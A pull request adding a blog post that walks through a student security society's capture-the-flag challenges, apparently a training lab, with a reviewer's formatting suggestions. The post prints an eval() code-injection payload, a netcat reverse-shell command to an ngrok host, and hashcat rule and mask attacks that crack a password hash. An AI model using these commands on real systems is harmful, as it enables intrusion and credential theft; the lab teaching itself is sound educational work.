### PR TITLE
Add week 1 writeup post

### PR DESCRIPTION
**Pull request by Nikelandjelo**

### CODE REVIEW

File: content/posts/week1_writeup/index.md [hunk 1]
```diff
@@ -0,0 +1,212 @@
...
+The first-week challenge covers the basics of OSINT research, opening remote connections and password cracking. I will try to cover most of the methods we can use to get through Jack's cat and Ben's secure passwords. Without further ado, let's begin.
+
+## Challenge 1: Web Username
+The first one was very tricky for me as I am not a cat person and don't enjoy cat pictures...
+<br />
+Anyway, as we go to the landing page, we can see that there are home(1) and login(2) pages and some information(3) about some employees.
+
+![Web Page](pics/webpage.png)
+
+As the challenge is OSINT related, we can try to find some accounts or any information on the internet related to these people. After a little bit of googling, I managed to find <a href="https://twitter.com/DixsonVarley" target="_blank">Dixon's Twitter account</a>. Following the chronology and the contest of the tweets, we can see that Dixon has started working for Insanity Accounting a while after he created his account. From one of the tweets, we can see a picture of his cat... and the username we were looking for on peace of paper under the cat......
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:24]:
```suggestion
As the challenge is OSINT related, we can try to find some accounts or any information on the internet related to these people. After a little bit of googling, I managed to find [Dixon's Twitter account](https://twitter.com/DixsonVarley). Following the chronology and the contest of the tweets, we can see that Dixon has started working for Insanity Accounting a while after he created his account. From one of the tweets, we can see a picture of his cat... and the username we were looking for on peace of paper under the cat......
```

File: content/posts/week1_writeup/index.md [hunk 2]
```diff
@@ -0,0 +1,212 @@
...
+authorLink: "https://nikelandjelo.github.io"
+
+---
+
+## Intro
+The first-week challenge covers the basics of OSINT research, opening remote connections and password cracking. I will try to cover most of the methods we can use to get through Jack's cat and Ben's secure passwords. Without further ado, let's begin.
+
+## Challenge 1: Web Username
+The first one was very tricky for me as I am not a cat person and don't enjoy cat pictures...
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:19]:
```suggestion

```

Comment (jackorcherton) [reply content/posts/week1_writeup/index.md:19]: Don't need break lines in hugo/markdown - all you need to do is leave a blank line

File: content/posts/week1_writeup/index.md [hunk 3]
```diff
@@ -0,0 +1,212 @@
...
+
+As the challenge is OSINT related, we can try to find some accounts or any information on the internet related to these people. After a little bit of googling, I managed to find <a href="https://twitter.com/DixsonVarley" target="_blank">Dixon's Twitter account</a>. Following the chronology and the contest of the tweets, we can see that Dixon has started working for Insanity Accounting a while after he created his account. From one of the tweets, we can see a picture of his cat... and the username we were looking for on peace of paper under the cat......
+
+![Username](pics/cat.png)
+
+`Flag: D.Varley772`
+
+## Challenge 2: Web Hashed Password
+The second challenge is more obvious.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:32]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 4]
```diff
@@ -0,0 +1,212 @@
...
+If we take a look over this tweet, we can see that Dixon messed up something and decided to share a link with us.
+
+![Tweet1](pics/tweetP1.png)
+
+The <a href="https://twitter.com/DixsonVarley/status/1431255932445417473" target="_blink">link</a> will take us to deleted tweet, but that doesn't mean we can't see it. By using <a href="https://archive.org/web/" target="_blank">WayBack</a> we can see the content of the tweet.
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:37]:
```suggestion
The [link](https://twitter.com/DixsonVarley/status/1431255932445417473) will take us to deleted tweet, but that doesn't mean we can't see it. By using [WayBack](https://archive.org/web/) we can see the content of the tweet.
```

File: content/posts/week1_writeup/index.md [hunk 5]
```diff
@@ -0,0 +1,212 @@
...
+
+![Tweet2](pics/tweetP2.png)
+
+And we got our second flag.
+
+`Flag: ab353a4eaf482265e7a85cba84422b4ab95fae8a4f5dd2bddea9548d53d1644a`
+
+## Challenge 3: What is Dixson's password?
+For challenge 3, we are being given a new hash as the one from challenge 2 is incorrect.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:47]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 6]
```diff
@@ -0,0 +1,212 @@
...
+To crack the hash we can use either `hashcat`, `johnny`, <a href="https://crackstation.net/" target="_blink">CrackStation</a>, `Cain&Abel`, etc. As `hashcat` is the best password brute force tool, in my opinion, I will use it, but CrackStation will do just fine for this password.
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:48]:
```suggestion
To crack the hash we can use either `hashcat`, `johnny`, [CrackStation](https://crackstation.net/), `Cain&Abel`, etc. As `hashcat` is the best password brute force tool, in my opinion, I will use it, but CrackStation will do just fine for this password.
```

File: content/posts/week1_writeup/index.md [hunk 7]
```diff
@@ -0,0 +1,212 @@
...
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:49]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 8]
```diff
@@ -0,0 +1,212 @@
...
+Password: qwertyuiop
+```
+
+Now we cant try logging in.
+
+![UI](pics/UI.png)
+
+Sweet! `eval()` = free shell.
+By running the following code, we can execute commands on the target machine: `eval('__import__("subprocess").getoutput("<COMMAND>")')`.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:82]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 9]
```diff
@@ -0,0 +1,212 @@
...
+We can get the flag by running `eval('__import__("subprocess").getoutput("cat /home/intern/user.txt")')`, but it would be more interesting if we get bind or reverse shell. There are many different ways of opening any of these shells, but as the system has `nc`, I will go with it.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:84]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 10]
```diff
@@ -0,0 +1,212 @@
...
+ngrok tcp 4444
+pwncat -l 0.0.0.0 4444 --self-inject /bin.bash:<NGINX_IP>:<NGINX_PORT>
+```
+### On the victim's machine
+```
+eval('__import__("subprocess").getoutput("nc <NGROK_IP> <NGROK_PORT> -e /bin/bash")')
+```
+![Reverse Shell](pics/rev_shell.png)
+And voila! We have a shell. Even if the shell gets closed for some reason (internet drops, we press `Ctl-C` by accident, etc.), the only thing we need to do is to open a new listener (`pwncat -l 0.0.0.0 4444`), and we will get connected.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:97]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 11]
```diff
@@ -0,0 +1,212 @@
...
+
+Here is what I know
+
+- I know my boss set the password
+- He has a cat called Collin
+- He has a daughter called Holly
+- The password he set for Splunk was h0lly_2001
+```
+Now we can use this info and hashcat rules to crack the password.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:142]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 12]
```diff
@@ -0,0 +1,212 @@
...
+So, if we already have one password we can use it as a template.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:144]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 13]
```diff
@@ -0,0 +1,212 @@
...
+Let's begin with the names. We can put them into a wordlist.
+```
+❯ cat < EOF > names.list
+> Collin
+> collin
+> Holly
+> holly
+> EOF
+```
+Now we can use a little bit of hashcat-fu and generate a new wordlist from our names. For this purpose, we can use rules. If you are not familiar with hashcat rules, check out their <a href="https://hashcat.net/wiki/doku.php?id=rule_based_attack" target="_blink">documentation</a>
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:154]:
```suggestion
Now we can use a little bit of hashcat-fu and generate a new wordlist from our names. For this purpose, we can use rules. If you are not familiar with hashcat rules, check out their [documentation](https://hashcat.net/wiki/doku.php?id=rule_based_attack)
```

File: content/posts/week1_writeup/index.md [hunk 14]
```diff
@@ -0,0 +1,212 @@
...
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:155]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 15]
```diff
@@ -0,0 +1,212 @@
...
+usa@sC<sE3sL1sO0sS$
+sa@sc<se3si1so0ss$
+lsa@sc<se3si1so0ss$
+usa@sC<sE3sI1sO0sS$
+```
+The command to generate it is:
+```
+hashcat -r rules names.list --stdout > wordlist.list
+```
+And once we have generated our new wordlist, we can try brute-forcing the password with a <a href="https://hashcat.net/wiki/doku.php?id=mask_attack" target="_blink">mask attack</a> that is going to look like this:
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:193]:
```suggestion
And once we have generated our new wordlist, we can try brute-forcing the password with a [mask attack](https://hashcat.net/wiki/doku.php?id=mask_attack) that is going to look like this:
```

File: content/posts/week1_writeup/index.md [hunk 16]
```diff
@@ -0,0 +1,212 @@
...
+```
+hashcat -m 1800 -a 6 hash.txt wordlist.list ?1?2?3?d?d -1 _- -2 12 -3 90
+```
+This mask will append `-` or `_` to the end of each word with folowing all the ears from `1900` to `2099`.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:198]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 17]
```diff
@@ -0,0 +1,212 @@
...
+After less then a second we will have our result.
+`Result: $6$czitf7EkuZDKvo1G$Fzuxy.As6BxQhNyUV0zq9z0ehkb3yhzSAOFekJ1jpf.J3/3wJ.v.ARwzq28tQp2XEI81tl.hb6bWWY29JLxnX0:C0ll1n_1989`
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:201]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 18]
```diff
@@ -0,0 +1,212 @@
...
+Now we just need the root flag.
+<br />
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:203]:
```suggestion

```

File: content/posts/week1_writeup/index.md [hunk 19]
```diff
@@ -0,0 +1,212 @@
...
+Bare in mind that to be able to gain live shell (TTY), you need to run: `/usr/bin/script -qc /bin/bash /dev/null`.
+From there:
+```
+su root
+cat /root/you_rooted_me.txt
+```
+`Flag: cueh{0h...y0u_can_us3_hashcat_rulezz}`
+
+<h3>Hope you have learned something new 😄🐈‍⬛</h3>
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:212]:
```suggestion
### Hope you have learned something new 😄🐈‍⬛
```

File: content/posts/week1_writeup/index.md (hunk 1 above)
Comment (jackorcherton) [reply content/posts/week1_writeup/index.md:24]: I've switched everything to [text](link) as this is shorter and easier to read in markdown - also I've used this for the rest of the site - so want to keep it the same :)

Also I've noticed that you open the links in a new tab, which is neat -> but I've already got a script to auto-do this in the hugo site

File: content/posts/week1_writeup/index.md [hunk 20]
```diff
@@ -0,0 +1,212 @@
...
+The <a href="https://twitter.com/DixsonVarley/status/1431255932445417473" target="_blink">link</a> will take us to deleted tweet, but that doesn't mean we can't see it. By using <a href="https://archive.org/web/" target="_blank">WayBack</a> we can see the content of the tweet.
+
+![Tweet2](pics/tweetP2.png)
+
+And we got our second flag.
+
+`Flag: ab353a4eaf482265e7a85cba84422b4ab95fae8a4f5dd2bddea9548d53d1644a`
+
+## Challenge 3: What is Dixson's password?
+For challenge 3, we are being given a new hash as the one from challenge 2 is incorrect.
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:46]:
```suggestion
For challenge 3, we are given a new hash as the one from challenge 2 is incorrect.
```

File: content/posts/week1_writeup/index.md [hunk 21]
```diff
@@ -0,0 +1,212 @@
...
+
+## Challenge 4: User Flag
+Great! We have credentials.
+
+```
+Username: D.Varley772
+Password: qwertyuiop
+```
+
+Now we cant try logging in.
```
Comment (jackorcherton) [inline content/posts/week1_writeup/index.md:76]: Think this is meant to be can?
```suggestion
Now we can try logging in.
```

**Review by jackorcherton — CHANGES_REQUESTED** [review]
Thank you so much for providing your write up for ComSec - it is great to see someone else other than me posting to the site!

I've made some suggestions so that it will fit in with the rest of the site. After you have fixed them would it please be possible for you to move everything to a folder named `/content/posts/taster_week1_writeup` - this is so it matches the session URL with just _write up added at the end.

Thanks again for adding your write-up!
Jack

File: content/posts/week1_writeup/index.md (hunk 1 above)
Comment (Nikelandjelo) [reply content/posts/week1_writeup/index.md:24]: Okay, will have it in mind. I didn't know you have the script, so this is why I took this approach

File: content/posts/week1_writeup/index.md (hunk 19 above)
Comment (Nikelandjelo) [reply content/posts/week1_writeup/index.md:210]: Used <h3> as the html header is skipped on the table of content

**Review by jackorcherton — APPROVED** [review]
All required changes done, so happy to approve

**Pull request merged**